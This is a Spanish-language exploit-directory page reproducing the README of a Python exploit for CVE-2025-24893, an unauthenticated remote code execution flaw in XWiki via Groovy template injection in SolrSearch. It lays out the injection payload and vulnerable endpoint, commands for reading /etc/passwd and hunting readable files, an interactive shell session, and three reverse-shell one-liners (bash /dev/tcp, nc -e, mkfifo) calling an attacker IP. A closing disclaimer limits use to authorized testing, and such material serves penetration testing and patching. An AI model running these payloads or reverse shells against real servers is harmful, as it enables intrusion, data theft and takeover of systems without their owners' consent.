Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-24893 — Ejecución remota de código no autenticada en XWiki a través de la macro SolrSearch | Kitploit
Herramientas/GitHubGitHub/gotr00t0day/cve-2025-24893
ExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónPruebas de PenetraciónRed Teaming
GitHubgotr00t0day/cve-2025-24893

CVE-2025-24893

Ejecución remota de código no autenticada en XWiki a través de la macro SolrSearch

Ver Repositorio
6hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit SSTI de XWiki

Un exploit en Python para la vulnerabilidad de Inyección de Plantillas del Lado del Servidor (SSTI) en XWiki a través de la inyección de plantillas Groovy en el endpoint SolrSearch.

Vulnerabilidad

  • Tipo: Inyección de Plantillas del Lado del Servidor (SSTI)
  • Componente: feed RSS de XWiki SolrSearch
  • Impacto: Ejecución Remota de Código
  • Versión Afectada: XWiki 15.10.8 (y potencialmente otras)

Requisitos

root@kitploit:~
pip3 install requests beautifulsoup4

Uso

Probar Vulnerabilidad

root@kitploit:~
./xwiki_exploit.py -u http://target --test

Ejecutar Comando Único

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "whoami"
./xwiki_exploit.py -u http://target.com -c "id"
./xwiki_exploit.py -u http://target.com -c "ls -la /tmp"

Shell Interactivo

root@kitploit:~
./xwiki_exploit.py -u http://target.com

Esto te dará un pseudo-shell interactivo donde puedes ejecutar comandos:

root@kitploit:~
xwiki> whoami
xwiki
xwiki> pwd
/usr/lib/xwiki-jetty
xwiki> ls /home
oliver
xwiki> exit

Modo Depuración

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "id" --debug

Opciones de Línea de Comandos

  • -u, --url URL: URL del objetivo (obligatorio)
  • -c, --command CMD: Ejecutar comando único
  • --test: Probar si el objetivo es vulnerable
  • --no-verify-ssl: Deshabilitar verificación del certificado SSL
  • --debug: Habilitar salida de depuración

Ejemplos

Recopilación de Información:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "uname -a"
./xwiki_exploit.py -u http://target.com -c "cat /etc/os-release"
./xwiki_exploit.py -u http://target.com -c "cat /etc/passwd"

Buscar Archivos Interesantes:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "find /home -type f -readable 2>/dev/null"
./xwiki_exploit.py -u http://target.com -c "ls -la /var/lib/xwiki"

Información de Red:

root@kitploit:~
./xwiki_exploit.py -u http://target.com -c "ip addr"
./xwiki_exploit.py -u http://target.com -c "netstat -tulpn"

Establecer Reverse Shell:

root@kitploit:~
# On attacker machine, start listener:
nc -lvnp 1337

# From exploit (try different methods):
./xwiki_exploit.py -u http://target.com -c "bash -c 'bash -i >& /dev/tcp/IP/1337 0>&1'"
./xwiki_exploit.py -u http://target.com -c "nc -e /bin/sh IP 1337"
./xwiki_exploit.py -u http://target.com -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc IP 1337 >/tmp/f"

Detalles Técnicos

Estructura del Payload

El exploit utiliza la siguiente estructura de payload SSTI:

root@kitploit:~
}}}{{async async=false}}{{groovy}}println("COMMAND".execute().text){{/groovy}}{{/async}}

Flujo de Explotación

  1. El payload está codificado en URL y se envía al endpoint vulnerable:

    root@kitploit:~
    /xwiki/bin/view/Main/SolrSearch?media=rss&text=[PAYLOAD]
    
  2. El servidor procesa la plantilla Groovy y ejecuta el comando

  3. La salida se captura de la respuesta del feed RSS en el formato:

    root@kitploit:~
    search on [}}OUTPUT]
    
  4. El exploit analiza la respuesta HTML para extraer la salida del comando

Notas

  • Los comandos se ejecutan como el usuario xwiki (uid=997)
  • El directorio de trabajo es /usr/lib/xwiki-jetty
  • Algunos comandos pueden no producir salida si fallan o se ejecutan en segundo plano
  • Para comandos complejos, considera usar scripts de shell o codificación base64

Descargo de Responsabilidad

Esta herramienta es solo para fines educativos y de pruebas de penetración autorizadas. Úsala únicamente en sistemas en los que tengas permiso para realizar pruebas.

Descargar herramienta